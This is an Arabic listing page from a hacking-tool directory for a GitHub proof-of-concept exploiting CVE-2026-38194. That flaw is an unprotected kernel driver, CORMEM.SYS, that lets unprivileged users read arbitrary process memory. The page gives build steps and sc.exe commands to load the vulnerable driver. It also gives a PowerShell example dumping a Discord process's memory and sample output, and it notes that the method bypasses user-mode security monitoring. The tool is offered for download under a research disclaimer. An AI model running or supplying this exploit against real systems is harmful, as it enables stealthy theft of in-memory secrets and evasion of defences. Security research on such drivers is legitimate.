Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cormem-read-poc — تُظهر هذه الأداة CVE-2026-38194، وهي ثغرة أمنية في Teledyne Digital Imaging Sapera Memory Manager (الإصدار 9.0.0.0 وما دونه). يقوم برنامج تشغيل النواة CORMEM.SYS بتعريض IOCTLs دون أي فحوصات للتحكم في الوصول، مما يسمح لمستخدم عادي غير مميز بقراءة وكتابة ذاكرة عملية عشوائية مباشرة من خلال النواة — متجاوزًا مراقبة Win32 API | Kitploit
أدوات/GitHubGitHub/4d4j/cormem-read-poc
تصعيد الامتيازاتتحليل الذاكرة الجنائيتحليل الثغرات الأمنيةالاستغلالالتعلم والتعليماستغلال الملفات الثنائية
GitHub4d4j/cormem-read-poc

cormem-read-poc

عرض المستودع
815منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

حول

تُظهر هذه الأداة CVE-2026-38194، وهي ثغرة أمنية في Teledyne Digital Imaging Sapera Memory Manager (الإصدار 9.0.0.0 وما دونه). يقوم برنامج تشغيل النواة CORMEM.SYS بتعريض IOCTLs دون أي فحوصات للتحكم في الوصول، مما يسمح لمستخدم عادي غير مميز بقراءة وكتابة ذاكرة عملية عشوائية مباشرة من خلال النواة — متجاوزًا مراقبة Win32 API

مشاركة

إخلاء مسؤولية:

هذا المشروع لأغراض البحث الأمني والتعليمي فقط. استخدمه فقط على أنظمة تمتلكها أو لديك إذن صريح لاختبارها. قد يكون الاستخدام غير المصرح به غير قانوني في بلدك.

cordrv_exploit — CVE-2026-38194

الثغرة الأمنية

توضح هذه الأداة الثغرة CVE-2026-38194، وهي ثغرة في Teledyne Digital Imaging Sapera Memory Manager (الإصدار 9.0.0.0 وما دونه).

يعرض برنامج تشغيل النواة CORMEM.SYS استدعاءات الإدخال/الإخراج (IOCTLs) دون أي فحوصات للتحكم في الوصول، مما يسمح لمستخدم عادي غير مميز بقراءة وكتابة ذاكرة أي عملية بشكل تعسفي مباشرة عبر النواة — متجاوزًا بذلك مراقبة Win32 API بالكامل.

poc

يتم الوصول إلى الذاكرة عبر ترجمة العنوان الفعلي (اجتياز جدول الصفحات) بدلاً من ReadProcessMemory، مما يجعلها شفافة بالنسبة لمعظم برامج الأمن في مساحة المستخدم.

المتطلبات

  • Windows 10/11
  • تحميل برنامج تشغيل CORMEM.SYS
  • Visual Studio 2022/2026 + CMake 3.20+

البناء

root@kitploit:~
cmake -B build -A x64
cmake --build build --config Release

تحميل برنامج التشغيل

إذا لم يكن CORMEM.SYS محملًا بالفعل، فقم بتحميله يدويًا كمسؤول:

root@kitploit:~
sc.exe create CORMEM binPath= "C:\path\to\CORMEM.SYS" type= kernel start= demand
sc.exe start CORMEM

قم بإلغاء التحميل عند الانتهاء:

root@kitploit:~
sc.exe stop CORMEM
sc.exe delete CORMEM

الاستخدام

root@kitploit:~
cordrv_exploit.exe <pid> <address> [size]

  pid      معرف العملية (رقم عشري)
  address  عنوان افتراضي للقراءة (سداسي عشري)
  size     عدد البايتات لتفريغها، القيمة الافتراضية 256، الحد الأقصى 1048576

مثال — قراءة رأس PE لتطبيق Discord

root@kitploit:~
# احصل على عملية Discord الرئيسية
$proc = Get-Process -Name "Discord" | Sort-Object WorkingSet -Descending | Select-Object -First 1
$discordPid = $proc.Id
$base = $proc.Modules[0].BaseAddress

Write-Host "PID  : $discordPid"
Write-Host "Base : 0x$($base.ToString('X'))"

.\build\Release\cordrv_exploit.exe $discordPid "0x$($base.ToString('X'))" 256

الناتج المتوقع:

root@kitploit:~
[*] Target PID     : 16364
[*] Target address : 0x7FF6FC180000
[*] Dump size      : 256 bytes

[*] Initializing CorDrv...
[+] Driver initialized.

[*] Finding system DTB...
[+] System DTB: 0x1AE000

[*] Searching EPROCESS list for PID 16364...
[+] Process DTB: 0x2CD30F000

[+] VA 0x7FF6FC180000 -> PA 0x1A98C2000

Memory dump (0x7FF6FC180000, 256 bytes):
  7FF6FC180000: 4D 5A 78 00 01 00 00 00 04 00 00 00 00 00 00 00
  7FF6FC180010: 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
  ...

[+] Done.

تؤكد 4D 5A عند الإزاحة 0 أنه تمت قراءة رأس MZ بنجاح من ذاكرة الوصول العشوائي الفعلية.

ملاحظات

  • لا يمكن قراءة الصفحات التي تم تبديلها إلى القرص (ستُرجع TranslateVirtualAddress قيمة 0).
  • بعض العمليات تلد مثيلات متعددة — استهدف دائمًا المثيل الذي يحتوي على أعلى مجموعة عمل.
  • قد يمنع HVCI / Secure Boot تحميل CORMEM.SYS على Windows 11 إذا كان برنامج التشغيل مدرجًا في القائمة المحظورة من Microsoft.
تنزيل الأداة